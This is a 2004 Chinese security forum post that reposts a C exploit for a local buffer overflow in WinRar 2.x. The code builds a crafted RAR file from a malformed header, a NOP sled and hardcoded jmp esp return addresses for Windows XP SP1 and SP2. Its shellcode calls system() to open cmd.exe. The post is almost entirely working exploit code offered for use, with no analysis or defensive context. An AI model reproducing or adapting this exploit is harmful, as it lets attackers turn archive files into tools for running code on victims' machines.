WinRar local buffer overflow exploit V1.0

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 591 小时
注册时间: 2004-6-25
最后登录: 2008-10-12

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-10-8 17:22 只看该作者

WinRar local buffer overflow exploit V1.0

文章作者：atmaca@prohack.net

复制内容到剪贴板

代码:

/*

* WinRar local buffer overflow exploit V1.0

* Coded By ATmaCA

* Copyright ? 2004 ProGroup Software, Inc.

* E-Mail:atmaca@prohack.net

* Web:[url]www.prohack.net[/url]

* Usage:\r\nexploit <Target> <OutputPath>

* Targets:

* 1 - WinXP SP1 user32.dll [0x77D718FC]

* 2 - WinXP SP2 user32.dll [0x77D8AF0A]

* Example:exploit 1 myrar.rar

*/



/*

* All WinRar 2.x series are effected

* 3.x series not effected

* If you want to test and you do not have WinRar V2.x

* You can download it from [url]http://atmaca.prorat.net/Src/winrar.zip[/url]

*/



#include <stdio.h>

#include <stdlib.h>

#include <conio.h>



#ifdef __BORLANDC__

     #include <mem.h>

#endif



#define NOP 0x90



/*crafted rar header*/

char winrar_header[] =

"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00\x00"

"\x00\x00\x00\x00\x4A\x91\x74\x80\x80\x35\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x02\x00\x00\x00\x00\x12";



/*launch a local cmd.exe*/

char shellcode[]=

"\x68"              // push

"cmd "              // cmd

"\x8B\xC4"           // mov eax,esp

"\x50"              // push eax

"\xB8\xc7\x93\xC2\x77"   // mov eax,77C293C7 (address of system() on WinXP SP2

- msvcrt.dll)

"\xFF\xD0"           // call eax

;



char *target[]=  //return addr

{

     "\xFC\x18\xD7\x77",  //User32 jmp esp addr  WinXp Sp1

     "\x0A\xAF\xD8\x77"   //User32 jmp esp addr  WinXp Sp2

};



char *sysadrr[]=

{

     "\x44\x80\xC2\x77",  //77C28044 XP Sp1  msvcrt.dll system()

     "\xC7\x93\xC2\x77"   //77C293C7 XP Sp2  msvcrt.dll system()

};



FILE  *di;

int   targetnum;

int   i;



void main(int argc, char *argv[])

{



     if (argc < 3)

     {

           printf("\r\nWinRar local buffer overflow exploit V1.0\r\n",

argv[0]);

           printf("Coded By ATmaCA\r\n");

           printf("Copyright ? 2004 ProGroup Software, Inc.\r\n");

           printf("E-Mail:atmaca@prohack.net\r\n");

           printf("Web:[url]www.prohack.net[/url]\r\n\r\n");

           printf("Usage:\r\nexploit <Target>

<OutputPath>\r\n\r\n",argv[0]);

           printf("Targets:\n");

           printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n");

           printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n");

           printf("Example:exploit 1 myrar.rar\n");



           return;

     }



     targetnum = atoi(argv[1]) - 1;



     if( (di=fopen(argv[2],"wb")) == NULL )

     {

          printf("Error opening file!\n");

          return;

     }

     for(i=0;i<sizeof(winrar_header)-1;i++)

          fputc(winrar_header[i],di);



     /*stuff in a couple of NOPs*/

     for(i=0;i<1051;i++)

          fputc(NOP,di);



     fprintf(di,"%s",target[targetnum]); //EIP



     for(i=0;i<50;i++) //NOPs

          fputc(NOP,di);



     memcpy(shellcode+9,sysadrr[targetnum],4); //system() addr



     /*Overwriting the return address (EIP) with JMP ESP address

     located somewhere in process space */

     for(i=0;i<sizeof(shellcode)-1;i++)

          fputc(shellcode[i],di);



     for(i=0;i<50;i++) //NOPs

          fputc(NOP,di);



     printf("Exploit rar file %s has been generated!\n",argv[2]);



     fclose(di);

}

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » WinRar local buffer overflow exploit V1.0